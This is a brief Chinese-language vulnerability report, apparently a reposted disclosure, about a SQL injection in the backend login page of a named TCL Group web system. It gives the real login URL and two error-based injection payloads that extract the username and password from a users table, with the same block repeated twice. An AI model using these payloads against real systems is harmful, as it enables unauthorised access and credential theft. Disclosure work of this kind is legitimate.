TCL集团邮件系统后台存在post注入,危害有点小大噢。
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx
只检测了一下users表
1' and 1=convert(int,(select top 1 pname from users)) and '1'='1
1' and 1=convert(int,(select top 1 password from users)) and '1'='1
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx
只检测了一下users表
1' and 1=convert(int,(select top 1 pname from users)) and '1'='1
1' and 1=convert(int,(select top 1 password from users)) and '1'='1
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;